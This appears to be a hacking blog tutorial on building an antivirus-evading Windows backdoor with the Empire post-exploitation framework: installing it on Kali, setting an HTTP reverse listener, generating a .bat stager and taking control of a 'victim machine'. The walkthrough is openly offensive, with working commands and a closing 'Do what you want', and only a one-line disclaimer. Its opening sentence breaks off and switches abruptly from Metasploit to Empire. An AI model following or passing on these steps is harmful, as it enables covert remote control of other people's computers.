Hi Hackers of How To KR! Welcome back to this new tutorial, In today's tutorial, I'm going to show you how to create Undetectable Metasploit backdoors, which uses a completely different method to escape Anti-Virus programs. We can generate backdoors for
Empire is a post-exploitation framework that includes a pure PowerShell 2.0 Windows agent and a pure Python 2.6/2.7 Linux / OS X agent. It's a fusion of the previous PowerShell Empire and Python EmPyre projects. The platform provides cryptologically secure communications and a robust architecture.
So Empire doesn't come preinstalled in kali, so we've got to install it first, let's start the process =>
Step 1: Installation
So we have to clone the repository from Github, Now as usual start from our terminal
Now we have to go to the setup directory
Now here we can see the install.sh file, which we have to install. Install it using the given command
Wait until the installer is finished, and then you can run the tool from its directory in / opt / Empire, so first you'll have to navigate to it using cd.
Now we can run the setup file to start the tool
And now we've opened the Empire successfully, Let's get our hand dirty.
Step 2 : Creating a listener
And the first thing we're going to do is establish a listener so we can get connections whenever the backdoor is executed on the target device. uBecause we're going to use a reverse connection so every time the backdoor is executed, it will try to connect back to our machine instead of us connecting to the backdoor. This approach is going to be less visible and we're going to be able to bypass a lot of firewalls so you can see right here when we start a device with zero listeners. And the first thing I 'm trying to do is make a listener follow the measure.
uselisteners (Then press the tab button twice)
Now as you can see its listing all the listeners that i can use, so for now we are gonna use the http listeners.
So this is basically very similar to what we do when we use the multi/handler with metasploit . So lets use the http listener.
Now i can set any of this option using the set command
lets set the port
set Port 8080
set Host: http://192.168.99.149:8080
Now we can see that our port is set to 8080
Now we are all set to create the listener
Now if we exit from the empire , it will not effect the listener, it will still be running in the bacckground.
Step 3 Creating a Backdoor :
To create a backdoor, follow the steps =>
usestager (press the tab button twice)
Now we can see that we can use many types of backdoor, But now we are gonna create the windows backdoor
Now we have to set the listener name to http
set Listener http
Now we have to set the Outfile, You can set the path to any where you want
set OutFile /var/www/html/evil-files/empire_http_8080.bat
Now we just have to enter the execute command
Now let's check whether or not antivirus can detect us
So we're only detecting two antivirus, now let's test it on the windows computer.
After We click the.bat file on the windows, we'll get back a connection to our kali machine like this.
Now if we want to interact to the windows machine we just have to type
interact (and the agent name)
We have successfully entered to the victim machine, Now Do what you want 🙂 Hacking Windows 10
This is just for educational purpose. Do not use it to harm others. !!